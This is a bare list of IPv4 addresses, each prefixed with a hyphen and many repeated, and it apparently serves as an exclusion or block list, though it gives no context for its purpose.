-179.156.115.202 -185.210.127.20 -42.189.13.94 -194.176.109.178 -183.88.214.182 -83.135.62.53 -187.112.47.119 -179.95.106.145 -180.183.116.86 -41.140.239.95 -189.78.124.20 -41.96.63.4 -37.104.81.157 -52.2.145.164 -175.138.4.78 -44.224.117.103 -177.206.227.40 -179.26.62.158 -45.236.240.90 -205.215.250.70 -41.96.54.165 -187.121.0.172 -41.96.255.147 -81.32.15.232 -189.68.76.73 -201.22.182.12 -177.133.44.32 -201.86.225.130 -207.35.200.162 -177.23.88.62 -183.88.214.182 -41.140.9.31 -183.88.214.182 -177.96.208.120 -41.96.116.99 -219.92.24.105 -179.187.251.229 -80.241.89.36 -196.203.50.173 -183.88.214.182 -45.236.240.90 -175.145.109.34 -186.57.114.191 -37.104.78.7 -116.203.188.126 -177.19.47.80 -41.96.20.152 -113.172.16.221 -94.130.75.86 -45.234.77.248 -183.88.214.182 -189.19.189.16 -191.250.73.135 -160.179.228.147 -80.241.89.36 -179.187.252.156 -45.236.240.90 -116.93.119.175 -1.9.155.195 -175.143.88.149 -125.27.187.93 -59.92.178.210 -3.249.82.239 -117.213.109.53 -59.92.87.249 -75.178.180.12 -190.115.112.160 -45.236.240.90 -45.236.240.90 -189.61.17.126 -189.91.227.228 -41.142.222.77 -175.138.4.121 -36.81.249.219 -175.137.61.61 -210.195.173.138 -200.23.187.63 -117.241.42.201 -80.231.232.22 -94.96.30.56 -41.96.219.187 -45.236.240.90 -186.54.214.93 -179.190.29.19 -196.92.141.59 -89.250.135.58 -181.81.16.199 -177.97.79.25 -45.236.240.90 -105.159.19.169 -113.172.95.54 -94.96.1.151 -179.26.64.215 -179.183.49.89 -201.33.196.110 -195.57.5.109 -175.139.40.197 -60.53.107.69 -186.50.80.61 -191.33.238.207 -41.96.219.187 -187.58.7.68 -189.154.195.162 -117.200.155.182 -117.221.9.76 -104.42.78.52 -80.231.232.27 -105.154.47.212 -61.2.36.122 -167.60.28.66 -117.213.110.149 -59.92.178.142 -59.92.85.150 -117.200.64.172 -1.6.91.58 -179.181.91.11 -104.156.56.44 -202.124.158.198 -81.26.164.19 -179.176.100.170 -45.236.240.90 -200.23.187.63 -183.88.214.182 -45.236.240.90 -61.1.154.28 -117.202.78.149 -16.170.214.138 -61.2.122.48 -117.221.241.233 -59.96.193.92 -59.95.160.245 -59.96.225.3 -191.33.199.103 -217.165.63.42 -52.38.35.108 -105.156.95.122 -186.54.216.159 -189.83.148.144 -187.65.10.243 -191.54.59.168 -177.205.94.24 -177.205.126.117 -189.26.136.235 -41.142.218.144 -18.133.124.121 -177.206.225.59 -218.248.2.251 -186.57.87.170 -41.96.49.140 -177.50.167.192 -187.32.161.250 -103.121.149.26 -175.143.63.214 -186.50.147.77 -45.236.240.90 -201.33.205.200 -41.96.144.226 -175.139.227.54 -179.178.251.123 -195.62.170.195 -75.178.181.50 -183.88.214.182 -183.88.214.182 -138.36.105.211 -216.154.219.26 -41.96.238.223 -82.77.1.254 -41.96.223.34 -117.197.202.6 -186.212.124.124 -186.54.214.245 -207.210.233.92 -167.57.205.232 -200.129.180.61 -41.141.88.23 -185.106.243.175 -131.161.105.212 -187.113.20.57 -124.13.134.159 -45.236.240.90 -45.236.240.90 -168.176.5.20 -75.178.181.50 -196.92.147.145 -18.134.128.122 -189.110.248.33 -191.33.17.12 -45.236.240.90 -177.83.255.104 -180.183.101.13 -179.177.26.129 -83.35.245.102 -183.88.214.182 -177.157.66.252 -186.55.10.189 -191.31.171.127 -200.146.119.126 -204.11.178.243 -207.210.233.92 -186.55.30.247 -45.236.240.90 -183.88.214.182 -138.201.69.180 -179.111.104.165 -191.187.125.68 -183.88.214.182 -177.22.88.205 -117.194.142.112 -177.157.83.254 -189.41.133.80 -138.66.34.62 -201.42.71.221 -187.183.199.136 -177.183.211.156 -199.101.246.196 -186.213.144.234 -200.187.177.160 -117.207.73.215 -179.184.25.106 -12.158.38.235 -117.221.242.216 -177.45.130.53 -117.194.131.189 -189.112.151.139 -45.236.240.90 -119.59.112.225 -177.9.66.191 -45.236.240.90 -179.183.118.123 -200.179.75.143 -177.207.23.116 -189.79.118.107 -186.229.185.109 -179.191.239.172 -212.170.18.70 -105.159.17.224 -186.50.171.10 -189.15.233.211 -177.156.66.111 -59.91.145.82 -59.91.149.104 -59.89.197.81 -177.204.238.203 -191.250.11.0 -117.200.145.103 -41.96.33.233 -216.201.13.171 -60.48.224.19 -189.231.165.61 -177.50.189.216 -41.96.39.82 -94.96.35.247 -189.112.81.107 -186.57.116.18 -45.236.240.90 -175.139.209.111 -167.60.117.135 -200.187.169.140 -193.226.90.201 -200.175.245.77 -177.191.52.26 -209.33.235.197 -209.33.235.196 -45.236.240.90 -191.250.252.171 -177.156.4.121 -200.178.8.205 -191.34.233.136 -177.7.208.139 -200.178.8.145 -213.97.128.61 -183.88.214.182 -177.156.68.186 -200.187.170.74 -45.236.240.90 -191.35.69.106 -34.82.223.21 -183.88.214.182 -45.236.240.90 -62.59.90.15 -209.33.235.197 -41.96.233.181 -115.134.110.83 -61.5.123.127 -196.70.123.41 -177.92.37.194 -177.148.178.132 -94.53.7.20 -177.17.117.217 -201.89.61.208 -209.33.235.196 -117.193.242.129 -46.255.208.70 -168.228.183.147 -45.236.240.90 -217.147.163.194 -217.127.206.251 -194.93.124.113 -189.46.44.58 -194.93.124.203 -37.192.63.84 -41.140.191.56 -201.10.169.75 -77.247.94.131 -186.54.216.58 -45.236.240.90 -83.4.160.248 -86.98.30.1 -186.57.104.180 -191.35.17.138 -168.197.77.53 -94.187.183.10 -179.179.141.89 -110.170.73.5 -194.93.124.113 -179.95.79.245 -44.201.0.203 -179.222.120.176 -209.33.235.196 -177.134.165.19 -45.236.240.90 -183.88.214.182 -187.113.28.109 -5.9.161.150 -5.9.161.145 -189.114.1.158 -177.98.164.216 -83.3.207.234 -18.142.90.86 -201.87.110.4 -45.236.240.90 -45.236.240.90 -177.94.123.25 -18.140.237.14 -209.33.235.197 -196.64.71.198 -3.83.28.49 -187.65.20.135 -179.95.163.252 -152.169.24.31 -94.96.19.137 -177.96.46.158 -45.179.75.107 -45.236.240.90 -188.52.45.57 -41.96.53.150 -18.140.198.29 -41.96.247.26 -189.46.193.92 -177.205.40.192 -66.232.104.106 -183.88.214.182 -61.3.199.231 -152.254.235.206 -152.249.124.99 -183.88.214.182 -45.236.240.90 -186.225.250.98 -177.45.212.85 -196.217.56.61 -191.223.216.183 -179.83.138.179 -191.251.50.53 -187.109.252.239 -66.232.104.106 -196.64.57.129 -101.108.180.54 -200.158.181.189 -190.182.168.2 -182.93.82.233 -189.154.39.135 -177.134.166.222 -191.55.180.206 -186.206.154.1 -200.187.163.91 -138.122.164.147 -175.139.244.190 -179.187.242.19 -41.142.96.254 -177.16.102.130 -186.52.157.129 -81.47.161.120 -160.178.16.225 -41.96.102.51 -189.108.172.122 -117.202.64.154 -200.150.122.71 -191.251.51.22 -190.134.245.14 -191.35.49.229 -186.57.77.150 -41.96.219.39 -177.156.84.249 -167.60.217.157 -83.99.48.129 -191.250.234.200 -179.183.59.143 -115.77.188.84 -196.65.187.208 -179.177.177.241 -175.140.229.29 -81.12.13.140 -103.242.118.249 -216.207.192.225 -41.96.184.141 -196.65.187.208 -200.146.249.38 -210.245.118.37 -103.220.223.161 -81.12.13.142 -85.96.190.207 -45.236.240.90 -191.250.1.174 -41.140.62.197 -186.210.94.255 -177.158.24.103 -60.51.211.15 -45.236.240.90 -179.247.180.64 -183.88.214.182 -190.134.12.89 -179.235.140.172 -183.88.214.182 -128.14.112.98 -171.97.53.105 -105.156.95.144 -2.89.68.63 -189.58.165.62 -41.96.221.91 -41.96.222.161 -186.53.126.53 -187.72.243.119 -121.121.88.73 -115.135.190.229 -179.186.31.219 -117.221.5.127 -34.230.186.5 -187.65.41.244 -89.231.198.98 -69.46.7.35 -200.100.80.11 -14.186.126.43 -186.54.222.30 -41.96.76.30 -186.52.154.85 -41.143.26.253 -175.145.109.56 -175.139.247.201 -177.23.94.14 -146.88.64.82 -189.112.244.195 -41.142.67.62 -177.206.140.131 -200.141.174.134 -117.201.18.246 -117.212.185.67 -117.221.1.141 -117.212.185.38 -117.212.184.170 -117.194.137.154 -117.201.6.73 -117.213.37.199 -59.96.228.21 -177.204.39.33 -117.201.24.30 -117.215.183.168 -175.139.211.253 -175.139.224.194 -117.241.219.153 -117.241.219.211 -59.92.102.74 -183.88.214.182 -117.212.179.122 -59.89.192.215 -59.88.190.31 -44.201.0.203 -117.194.129.110 -117.207.76.253 -117.197.200.182 -59.93.165.67 -117.201.17.135 -117.212.181.212 -117.194.136.192 -117.221.240.226 -2.89.106.55 -117.212.178.235 -200.187.169.184 -179.26.107.123 -117.213.78.109 -61.3.252.184 -186.57.126.46 -196.64.158.114 -61.2.37.168 -117.200.146.61 -117.193.242.212 -61.3.203.227 -54.213.167.3 -59.98.59.48 -117.212.189.223 -66.102.231.29 -117.221.11.190 -117.221.11.3 -117.221.10.233 -59.89.195.41 -183.88.214.182 -59.92.177.36 -117.221.10.178 -200.129.129.248 -117.241.41.174 -59.92.237.17 -59.95.161.216 -41.96.43.163 -117.221.233.80 -175.140.73.97 -117.200.156.250 -41.142.67.62 -117.194.131.169 -117.201.8.63 -117.202.67.94 -117.202.139.159 -117.201.24.94 -117.221.246.225 -59.96.52.215 -59.92.82.157 -189.19.143.199 -117.218.121.190 -59.92.18.23 -59.89.236.235 -117.221.13.53 -59.92.121.99 -117.194.138.188 -117.200.153.26 -117.221.3.109 -117.221.3.9 -117.202.143.204 -59.88.180.176 -117.201.18.32 -117.221.6.23 -190.133.248.125 -117.221.11.120 -117.221.241.13 -177.158.3.108 -59.96.224.127 -61.3.245.72 -117.221.15.137 -117.213.35.233 -186.48.6.33 -41.96.57.8 -59.89.194.12 -59.92.18.166 -179.186.137.139 -117.221.14.45 -98.191.62.9 -117.221.11.106 -209.20.65.118 -117.239.0.76 -117.207.70.157 -117.201.29.15 -2.89.106.55 -191.249.121.176 -41.96.43.163 -41.96.57.8 -125.27.187.158 -179.26.209.18 -82.208.158.217 -179.98.137.241 -179.235.253.208 -54.183.253.25 -177.156.70.41 -179.162.207.169 -190.114.244.125 -183.88.214.182 -117.228.149.16 -59.99.211.107 -117.212.178.205 -213.81.173.238 -196.206.157.179 -117.201.21.133 -175.141.26.195 -177.50.190.239 -41.96.70.72 -191.54.229.222 -167.56.72.159 -117.221.241.182 -201.33.207.17 -167.60.238.22 -54.207.169.108 -186.48.250.107 -41.96.192.61 -2.89.103.214 -196.70.30.223 -113.172.68.49 -45.236.240.90 -179.186.67.105 -45.236.240.90 -209.20.65.118 -196.206.157.179 -50.16.46.13 -173.198.41.140 -88.247.25.207 -202.51.64.135 -41.140.140.156 -177.18.255.181 -213.124.108.82 -45.236.240.90 -179.187.253.87 -185.106.243.175 -201.43.27.103 -179.26.59.223 -201.47.181.113 -179.225.161.86 -125.27.184.55 -157.175.172.58 -35.157.192.211 -189.112.244.15 -195.45.74.35 -45.236.240.90 -52.211.139.78 -13.244.102.245 -186.50.146.47 -180.75.10.150 -191.250.13.82 -149.248.7.205 -94.96.8.76 -186.86.49.2 -105.97.3.170 -178.242.14.146 -175.139.226.191 -167.57.152.29 -18.205.249.41 -44.197.124.78 -186.48.126.210 -41.79.124.17 -177.205.121.211 -186.222.38.146 -196.65.92.89 -70.151.12.40 -179.162.190.186 -179.26.211.156 -179.185.142.10 -186.57.75.62 -41.96.163.75 -103.51.74.20 -177.132.210.1 -195.251.13.15 -201.33.206.213 -175.142.114.235 -179.176.114.33 -58.71.194.37 -46.97.17.94 -125.27.195.146 -52.138.140.75 -138.204.93.84 -177.205.47.208 -45.236.240.90 -183.88.214.182 -191.30.1.61 -191.33.5.235 -179.158.237.171 -45.236.240.90 -66.232.104.106 -3.88.132.240 -183.80.198.36 -121.121.89.175 -191.251.51.232 -183.88.214.182 -20.85.44.203 -183.88.214.182 -179.178.202.160 -13.229.34.124 -177.50.169.242 -167.57.200.150 -124.82.84.125 -202.164.44.187 -138.122.166.42 -186.55.178.167 -180.75.8.13 -41.98.0.34 -186.52.125.162 -176.221.109.190 -117.221.3.161 -83.167.195.166 -117.202.70.132 -188.52.35.86 -34.228.118.10 -61.2.217.94 -117.200.145.141 -117.200.152.59 -117.201.10.200 -191.54.165.61 -59.93.165.210 -59.98.57.205 -197.204.233.199 -117.213.69.180 -117.212.191.253 -59.92.180.73 -59.90.86.208 -59.96.230.51 -52.201.142.55 -117.197.195.167 -117.213.106.208 -59.91.155.99 -59.91.159.129 -117.201.10.72 -117.213.36.18 -117.221.3.187 -115.133.51.124 -70.151.12.40 -83.167.195.166 -183.88.39.39 -198.51.63.154 -41.142.85.21 -41.142.85.21 -24.232.3.59 -200.130.3.111 -187.189.235.100 -36.76.126.178 -183.88.214.182 -201.121.173.112 -179.181.192.248 -45.236.240.90 -171.22.25.127 -71.172.1.226 -171.22.25.127 -71.172.1.236 -50.205.159.161 -50.205.159.146 -91.21.253.22 -179.156.190.157 -183.88.59.91 -200.150.108.115 -187.183.215.208 -83.110.99.211 -179.26.225.117 -41.142.81.138 -41.96.69.221 -197.204.238.185 -2.89.70.201 -186.54.241.177 -59.91.18.189 -41.96.171.29 -177.96.148.47 -117.194.139.84 -117.207.69.11 -59.92.95.148 -59.89.198.191 -117.221.7.85 -117.221.238.109 -117.197.204.252 -117.202.69.197 -61.2.37.59 -117.194.131.88 -59.99.210.7 -178.254.100.157 -117.201.24.232 -117.221.13.241 -117.241.42.139 -117.241.42.30 -59.88.181.192 -59.88.179.27 -59.89.193.113 -117.197.198.220 -117.215.181.242 -59.92.18.71 -61.2.75.58 -117.194.129.234 -117.197.200.26 -117.200.145.68 -186.52.167.4 -186.57.101.75 -117.201.2.212 -117.212.191.52 -117.212.189.38 -59.91.147.113 -117.201.16.35 -117.194.136.67 -59.96.228.174 -186.48.136.87 -117.221.14.151 -117.221.13.230 -59.96.54.123 -117.201.2.111 -61.2.35.39 -117.201.23.221 -117.221.12.18 -186.54.241.177 -117.241.217.26 -117.194.143.86 -117.194.143.105 -117.194.132.208 -117.212.177.174 -117.200.156.170 -117.241.43.75 -59.92.84.227 -177.133.16.115 -117.221.13.194 -117.200.159.191 -59.89.206.232 -61.3.245.144 -117.202.0.157 -41.96.69.221 -117.212.184.158 -117.221.11.130 -59.96.171.254 -117.241.43.37 -59.91.151.95 -59.93.165.206 -59.96.55.14 -117.200.153.223 -117.212.178.212 -117.215.180.131 -117.213.66.226 -117.201.21.98 -59.92.178.29 -167.57.220.199 -94.96.23.141 -117.217.214.129 -117.194.132.231 -61.2.217.5 -175.139.40.26 -189.81.25.45 -200.232.197.216 -183.88.214.182 -115.133.208.227 -183.88.214.182 -2.89.90.196 -186.52.225.113 -186.54.80.138 -59.96.226.163 -195.88.204.13 -41.96.27.209 -59.92.191.182 -197.204.239.221 -190.133.249.243 -117.201.18.206 -41.143.19.141 -186.18.233.113 -117.217.188.113 -94.96.38.109 -59.96.52.80 -117.213.67.148 -196.65.239.121 -117.201.19.246 -117.194.136.44 -23.88.49.222 -175.139.40.7 -117.201.23.58 -117.212.180.86 -117.201.22.225 -179.162.199.67 -195.88.205.13 -117.241.217.199 -66.232.104.106 -41.142.239.142 -177.97.54.233 -186.214.141.204 -183.88.214.182 -209.40.197.71 -59.98.59.218 -64.79.217.104 -209.59.202.86 -189.59.46.121 -209.40.198.72 -209.40.192.142 -67.223.224.13 -175.144.53.137 -62.94.56.23 -209.40.197.53 -54.174.184.54 -54.183.169.223 -45.236.240.90 -209.40.193.144 -177.159.222.44 -177.197.110.70 -209.239.99.81 -41.140.185.202 -180.183.124.17 -99.193.245.231 -175.141.149.41 -66.232.104.106 -217.115.219.138 -219.92.27.157 -45.236.240.90 -189.61.125.28 -189.58.145.31 -179.191.239.188 -181.60.245.161 -121.121.102.241 -41.96.90.185 -179.24.224.208 -105.102.221.53 -200.121.78.10 -189.27.119.252 -52.221.200.15 -201.217.151.138 -189.154.105.79 -175.145.110.134 -183.88.214.182 -167.60.253.40 -201.217.151.142 -117.217.185.198 -59.92.239.115 -59.96.228.193 -59.95.163.148 -117.221.12.6 -177.133.13.69 -117.241.217.128 -201.217.151.140 -179.24.197.89 -105.97.100.135 -78.30.57.57 -117.194.136.111 -117.213.109.161 -117.223.35.72 -117.221.10.123 -59.99.103.207 -117.221.241.56 -59.92.82.205 -177.34.245.4 -59.92.83.29 -117.221.9.136 -117.207.72.112 -117.207.72.165 -187.181.129.216 -189.62.167.76 -117.200.147.54 -117.193.241.100 -117.221.11.113 -117.221.10.236 -117.201.3.168 -123.201.101.108 -117.213.76.60 -117.200.157.227 -117.207.76.71 -117.221.10.219 -59.91.146.140 -117.201.19.111 -13.245.255.39 -201.217.151.139 -117.197.201.182 -167.60.74.190 -179.222.120.194 -117.213.37.133 -59.91.159.153 -105.158.183.72 -117.207.77.116 -41.96.63.219 -59.91.147.145 -186.214.129.133 -59.91.157.121 -59.92.84.222 -117.202.188.107 -177.18.190.79 -186.50.99.168 -117.201.18.86 -177.138.112.156 -186.57.117.14 -201.217.151.141 -117.221.6.113 -186.55.9.208 -41.96.90.185 -41.98.127.227 -183.88.214.182 -45.236.240.90 -179.219.69.31 -74.62.126.66 -13.208.110.102 -177.92.34.138 -187.1.89.33 -160.177.154.148 -117.212.181.213 -201.29.91.255 -67.223.230.14 -183.88.214.182 -190.119.182.152 -212.77.176.34 -179.95.230.144 -45.236.240.90 -183.88.214.182 -45.236.240.90 -183.88.214.182 -45.236.240.90 -183.88.214.182 -45.236.240.90 -41.142.79.184 -45.236.240.90 -45.236.240.90 -45.236.240.90 -177.35.89.145 -183.88.214.182 -45.236.240.90 -45.236.240.90 -183.88.214.182 -171.22.25.127 -45.236.240.90 -189.61.125.132 -191.31.17.121 -66.232.104.106 -45.236.240.90 -45.236.240.90 -179.67.94.143 -200.163.147.19 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -45.236.240.90 -114.143.155.138 -98.174.83.162 -183.88.214.182 -183.88.214.182 -183.88.214.182 -191.54.58.164 -117.199.136.235 -45.236.240.90 -182.72.92.162 -66.232.104.106 -35.182.218.155 -191.185.39.168 -18.235.4.50 -34.248.133.152 -187.32.176.121 -186.210.95.136 -189.112.54.94 -177.205.123.175 -177.94.98.132 -13.126.97.82 -189.231.109.16 -177.69.52.70 -54.216.60.36 -186.223.228.206 -41.103.226.7 -186.49.15.170 -105.158.244.163 -189.112.182.120 -49.12.229.46 -78.30.58.126 -179.26.70.189 -187.28.101.33 -105.102.136.182 -117.218.46.141 -34.248.133.152 -189.112.48.14 -177.191.48.133 -54.216.60.36 -187.113.27.167 -183.88.214.182 -186.57.127.191 -201.28.177.58 -177.191.248.121 -45.236.240.90 -219.92.154.136 -219.254.32.150 -196.64.64.162 -117.218.46.141 -99.79.122.172 -189.38.242.201 -168.228.181.61 -61.0.233.187 -195.57.11.18 -189.211.188.170 -191.13.110.168 -45.236.240.90 -13.236.1.19 -191.220.1.62 -177.137.237.170 -177.45.175.89 -197.204.131.80 -79.131.185.61 -190.133.0.20 -189.49.217.169 -41.96.89.199 -177.50.163.90 -187.21.151.136 -177.30.97.77 -213.212.201.53 -190.193.249.158 -41.96.201.72 -41.33.222.132 -167.63.99.31 -59.92.117.254 -179.176.109.242 -177.205.113.160 -177.43.88.146 -200.123.187.203 -186.50.110.220 -219.92.154.162 -41.33.222.130 -191.176.208.36 -175.140.72.45 -177.207.87.132 -180.245.32.14 -103.228.35.252 -45.236.240.90 -183.88.214.182 -89.143.244.106 -183.87.203.85 -187.65.156.160 -41.140.190.237 -157.175.56.248 -191.250.53.181 -200.187.168.52 -121.123.55.227 -177.96.64.86 -52.66.91.166 -152.249.127.152 -201.42.114.35 -177.188.247.124 -189.112.92.6 -190.113.60.6 -200.123.187.203 -177.188.254.245 -191.251.47.32 -186.49.69.107 -13.245.30.25 -177.235.20.23 -115.133.72.76 -45.236.240.90 -189.112.150.205 -179.26.43.223 -66.232.104.106 -187.180.93.94 -177.157.92.200 -191.31.28.59 -187.56.86.114 -189.28.166.52 -45.236.240.90 -200.33.152.238 -117.194.133.185 -186.210.30.92 -157.164.189.165 -182.18.140.194 -200.187.162.207 -179.152.34.251 -179.152.34.251 -185.17.196.196 -170.81.191.242 -187.39.30.220 -183.88.214.182 -45.236.240.90 -117.200.149.251 -177.206.199.203 -45.236.240.90 -41.67.137.50 -182.18.140.196 -45.236.240.90 -201.95.48.66 -219.254.32.150 -183.88.61.9 -105.159.184.121 -185.17.196.196 -3.209.138.236 -200.1.115.100 -202.152.23.73 -189.79.76.83 -196.217.57.64 -191.252.197.86 -180.75.11.118 -105.159.184.121 -179.83.142.74 -179.100.24.227 -179.186.41.18 -201.48.102.220 -186.210.86.109 -179.179.136.54 -66.232.104.106 -177.207.225.111 -15.152.39.21 -189.27.125.79 -59.92.94.23 -117.254.64.90 -3.235.231.16 -54.166.99.28 -189.46.142.250 -177.100.203.53 -177.191.45.79 -187.108.204.57 -177.159.136.40 -45.236.240.90 -52.15.107.0 -41.142.87.120 -191.251.29.20 -186.210.89.104 -189.61.124.13 -217.238.186.134 -66.232.104.106 -160.176.233.86 -88.4.155.238 -167.56.76.155 -52.62.19.2 -83.99.49.202 -125.27.231.34 -191.33.12.39 -189.89.168.162 -179.84.100.99 -60.50.171.105 -125.63.86.66 -183.88.214.182 -45.236.240.90 -187.64.129.236 -189.26.169.6 -177.157.126.224 -45.236.240.90 -177.206.82.237 -105.157.121.20 -66.42.140.110 -183.88.214.182 -59.88.186.102 -183.88.214.182 -166.78.243.82 -177.1.129.9 -83.4.90.33 -24.101.151.220 -186.223.228.206 -177.62.94.124 -201.86.164.73 -3.26.32.115 -189.46.193.208 -59.96.52.229 -189.91.227.69 -179.219.42.8 -191.251.120.66 -187.114.184.187 -185.106.240.79 -185.106.240.78 -191.253.110.68 -201.92.41.219 -105.102.241.210 -83.15.109.58 -166.78.243.82 -189.26.138.173 -117.216.9.59 -179.181.88.163 -141.164.43.243 -177.17.80.157 -200.233.227.205 -183.88.214.182 -191.13.162.201 -37.252.123.143 -187.19.165.125 -187.74.127.119 -179.182.12.6 -200.121.78.10 -185.200.165.29 -189.59.214.102 -190.113.60.6 -179.209.81.5 -201.86.50.186 -191.33.233.201 -177.138.27.123 -191.191.99.142 -177.205.111.184 -179.95.92.106 -191.55.195.218 -79.217.93.42 -177.107.191.146 -160.179.86.102 -189.68.140.83 -189.26.221.203 -117.213.69.149 -103.251.43.153 -117.218.92.16 -200.19.222.18 -187.113.24.246 -219.254.32.150 -5.249.128.21 -41.96.218.254 -91.61.80.7 -198.51.63.161 -203.223.190.109 -15.185.250.249 -186.49.9.236 -201.95.125.79 -34.204.185.107 -13.214.137.126 -201.19.223.39 -105.154.116.20 -3.14.126.14 -182.93.85.239 -191.31.28.176 -183.88.214.182 -52.11.119.164 -170.83.162.129 -179.251.153.199 -18.231.190.253 -18.170.43.96 -179.154.241.138 -59.89.237.192 -189.59.51.166 -117.212.190.89 -183.88.214.182 -34.204.185.107 -177.17.184.235 -52.12.4.8 -59.92.92.33 -207.210.233.92 -98.153.115.222 -66.232.104.106 -59.99.226.144 -18.141.206.167 -34.243.134.8 -187.65.9.162 -179.187.240.195 -201.121.211.149 -189.115.57.130 -189.26.129.242 -118.200.42.249 -45.236.240.90 -191.31.28.57 -45.236.240.90 -189.90.54.179 -179.127.87.107 -173.68.146.20 -188.50.254.255 -3.231.59.36 -102.53.51.131 -117.217.181.33 -109.167.231.226 -117.197.203.118 -78.189.17.110 -85.105.246.243 -190.139.39.2 -186.215.70.250 -189.231.125.36 -191.19.193.73 -18.195.214.128 -179.95.197.233 -14.186.126.5 -20.75.45.249 -179.107.34.26 -185.17.196.195 -137.103.44.60 -200.187.60.109 -200.5.239.218 -200.54.71.117 -200.139.16.33 -191.187.121.87 -45.236.240.90 -187.74.255.154 -177.42.48.12 -179.152.38.56 -191.31.105.22 -115.133.72.106 -183.88.214.182 -177.96.210.172 -43.224.139.174 -180.92.162.35 -179.222.122.193 -59.91.156.23 -187.64.129.236 -59.99.100.48 -117.221.12.31 -117.221.12.15 -117.221.11.213 -185.17.196.195 -117.241.217.139 -59.91.152.95 -173.68.146.20 -117.201.21.147 -189.112.244.199 -61.2.37.55 -202.149.208.20 -118.69.218.81 -118.69.218.81 -41.96.91.12 -3.97.55.102 -167.61.254.210 -160.177.153.41 -175.145.112.22 -179.181.72.122 -175.136.213.118 -160.176.195.174 -103.148.156.254 -186.48.69.249 -201.27.214.186 -179.183.186.181 -170.84.53.166 -51.161.106.51 -177.158.21.197 -54.248.20.7 -181.89.132.55 -190.133.3.18 -52.203.98.221 -191.31.24.119 -196.64.72.196 -52.70.205.35 -179.176.115.141 -189.154.123.46 -181.99.85.175 -175.143.61.112 -181.119.52.82 -219.92.27.157 -175.139.225.211 -78.189.17.110 -196.217.56.4 -177.159.244.145 -177.18.189.118 -59.99.223.9 -177.30.95.115 -88.132.228.143 -177.98.242.234 -179.24.193.252 -179.187.9.9 -196.77.100.189 -191.34.101.219 -177.50.173.114 -189.18.102.191 -189.59.181.143 -186.210.28.148 -186.57.111.78 -179.24.200.93 -196.92.146.189 -2.89.96.85 -41.96.234.245 -117.221.7.144 -117.241.40.149 -70.151.12.34 -117.194.139.61 -59.92.80.114 -117.221.241.171 -117.221.13.127 -177.159.130.25 -177.144.157.13 -186.212.70.193 -45.236.240.90 -183.88.214.182 -213.171.214.189 -187.59.106.175 -177.43.152.184 -59.89.239.235 -117.217.187.27 -117.201.20.90 -117.213.38.79 -117.221.8.112 -59.92.116.179 -117.200.144.115 -59.92.96.117 -117.241.40.80 -59.96.225.80 -117.200.154.72 -117.212.177.124 -117.217.189.67 -117.213.105.210 -177.97.186.175 -177.45.173.243 -41.96.204.87 -103.228.19.175 -186.50.79.138 -45.236.240.90 -168.235.128.106 -201.42.113.98 -41.96.26.145 -177.159.130.14 -181.81.134.124 -183.88.214.182 -157.90.114.36 -186.214.65.34 -41.251.172.59 -191.35.213.149 -81.12.221.45 -191.54.62.23 -35.182.245.98 -121.122.124.163 -41.97.155.4 -187.121.77.243 -117.212.191.154 -59.89.195.225 -59.96.226.124 -117.200.147.45 -117.212.185.3 -177.134.107.65 -52.200.101.95 -183.88.35.217 -117.212.180.54 -15.185.34.79 -59.91.145.6 -59.99.222.28 -191.54.59.240 -117.207.66.1 -117.221.12.149 -59.88.186.1 -186.52.170.66 -188.52.21.53 -177.132.231.127 -124.82.51.19 -117.202.41.170 -78.30.56.43 -117.212.183.211 -117.221.244.212 -117.221.12.238 -59.92.176.249 -179.158.228.64 -41.96.237.102 -179.214.19.197 -41.96.237.102 -186.57.65.61 -41.142.69.209 -61.3.243.143 -110.139.95.187 -188.19.13.70 -117.221.7.1 -179.181.155.209 -177.134.32.215 -80.190.64.221 -175.139.245.91 -179.178.197.154 -194.225.148.32 -186.113.7.94 -177.27.212.114 -177.52.212.191 -201.93.236.5 -189.114.247.0 -117.221.14.160 -117.201.16.221 -180.183.129.5 -202.62.224.180 -117.221.7.158 -117.212.185.192 -61.2.32.162 -117.213.36.100 -41.96.48.107 -186.210.27.52 -117.217.213.165 -201.48.182.217 -186.66.16.18 -117.206.128.158 -35.183.15.177 -190.244.157.11 -179.95.114.252 -177.221.40.134 -190.122.164.74 -179.183.184.147 -183.88.214.182 -195.175.45.18 -186.52.211.148 -177.204.33.184 -80.53.252.100 -65.249.131.126 -13.229.146.56 -13.38.6.99 -65.249.131.126 -191.31.18.109 -189.27.29.201 -217.125.149.127 -47.21.22.164 -59.92.82.163 -117.221.3.212 -117.201.21.100 -117.241.41.203 -59.92.94.129 -59.92.80.169 -201.48.117.50 -117.201.7.198 -117.215.183.3 -117.215.183.30 -117.221.14.216 -200.146.247.187 -117.221.15.15 -117.213.39.183 -177.132.250.118 -177.206.169.119 -18.7.27.213 -175.139.225.50 -186.50.94.123 -190.221.18.146 -41.140.184.195 -200.146.249.86 -172.105.17.167 -179.105.211.203 -187.39.19.165 -186.222.20.38 -167.56.78.75 -180.74.240.104 -190.221.18.146 -191.250.51.172 -179.105.214.232 -187.114.29.228 -177.159.72.114 -187.255.130.144 -45.179.75.197 -177.189.190.127 -94.230.19.50 -196.70.216.127 -187.32.91.33 -45.236.240.90 -138.36.99.123 -199.166.6.189 -34.252.105.67 -164.52.208.234 -187.32.91.35 -160.177.157.52 -186.52.179.236 -179.233.218.232 -45.184.68.139 -45.236.240.90 -186.57.112.132 -177.95.37.123 -189.18.102.233 -189.154.4.116 -175.139.40.2 -201.103.70.226 -59.92.94.143 -41.142.80.134 -59.99.220.247 -117.241.42.28 -117.217.178.14 -117.197.207.134 -117.221.240.183 -117.241.70.4 -59.99.102.255 -5.26.170.128 -179.187.255.228 -117.221.240.120 -179.26.78.44 -45.236.240.90 -179.222.122.42 -2.89.91.178 -41.96.41.18 -177.35.16.170 -177.50.190.33 -191.55.199.129 -191.55.199.166 -34.245.147.39 -117.201.19.179 -45.171.46.10 -62.216.237.47 -207.112.107.200 -187.112.82.172 -207.112.107.202 -191.35.249.19 -179.26.65.52 -13.51.178.78 -183.88.214.182 -181.81.154.115 -191.54.132.124 -54.219.130.171 -42.189.17.213 -189.110.247.85 -175.140.162.14 -179.83.42.132 -177.193.185.216 -186.214.216.113 -121.123.72.167 -219.92.154.233 -189.6.145.17 -200.140.42.143 -181.80.78.99 -191.54.56.147 -189.61.121.11 -186.57.107.164 -177.191.57.165 -102.53.60.128 -109.239.58.126 -105.157.131.254 -191.250.216.109 -45.236.240.90 -186.210.87.119 -103.237.147.110 -187.57.247.198 -13.229.34.124 -183.88.214.182 -179.233.220.10 -187.65.177.62 -191.55.194.141 -183.88.214.182 -196.206.170.53 